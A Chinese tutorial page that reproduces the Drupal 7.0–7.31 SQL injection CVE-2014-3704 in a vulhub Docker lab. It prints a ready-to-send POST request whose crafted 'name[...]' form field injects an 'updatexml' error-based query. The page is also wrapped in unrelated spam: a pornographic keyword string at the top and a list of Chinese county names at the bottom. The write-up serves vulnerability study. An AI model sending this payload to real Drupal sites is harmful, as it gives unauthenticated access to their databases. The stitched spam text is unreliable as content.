91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

如何進行Drupal SQL注入漏洞CVE-2014-3704的復現

發布時間:2021-12-29 17:46:34 來源:億速云 閱讀:386 作者:柒染 欄目:安全技術

如何進行Drupal SQL注入漏洞CVE-2014-3704的復現,很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。

Drupal是使用PHP語言編寫的開源內容管理框架(CMF),它由由內容管理系統和PHP開發框架共同構成,在GPL2.0及更新協議下發布。連續多年榮獲全球最佳CMS大獎,是基于PHP語言最著名的WEB應用程序。

Drupal 是一款用量龐大的CMS,其7.0~7.31版本中存在一處無需認證的SQL漏洞。通過該漏洞,攻擊者可以執行任意SQL語句,插入、修改管理員信息,甚至執行任意代碼。

影響版本: 7.0~7.31

下面僅作漏洞復現記錄與實現,利用流程如下:

一、漏洞環境

本環境采用vulhub搭建

執行以下指令完成環境搭建

cd drupal/CVE-2014-3704/

docker-compose up -d

啟動完畢后會開啟8080端口

漏洞鏈接:http://192.168.101.152:8080/

如何進行Drupal SQL注入漏洞CVE-2014-3704的復現

初次訪問需要安裝,采用默認安裝即可,Mysql數據庫名填寫drupal,數據庫用戶名、密碼為root,地址為mysql

如何進行Drupal SQL注入漏洞CVE-2014-3704的復現

安裝完成后,訪問首頁如下:

如何進行Drupal SQL注入漏洞CVE-2014-3704的復現

二、漏洞利用

直接發送數據包

POST /?q=node&destination=node HTTP/1.1
Host: 192.168.101.152:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,user()),0)%23]=bob&name[0]=a

即可觸發漏洞,注意Content-Type要設置為application/x-www-form-urlencoded

如何進行Drupal SQL注入漏洞CVE-2014-3704的復現

查詢數據庫

如何進行Drupal SQL注入漏洞CVE-2014-3704的復現

看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

绥棱县| 新和县| 泸水县| 社旗县| 积石山| 奎屯市| 西昌市| 南昌市| 苏尼特左旗| 吴旗县| 炎陵县| 三明市| 安塞县| 齐齐哈尔市| 巨鹿县| 获嘉县| 久治县| 虹口区| 博爱县| 彝良县| SHOW| 新昌县| 平远县| 基隆市| 图木舒克市| 平湖市| 栾川县| 荆门市| 腾冲县| 鹤峰县| 湖北省| 登封市| 大洼县| 连江县| 彭阳县| 华阴市| 遂溪县| 安福县| 密云县| 江门市| 通州区|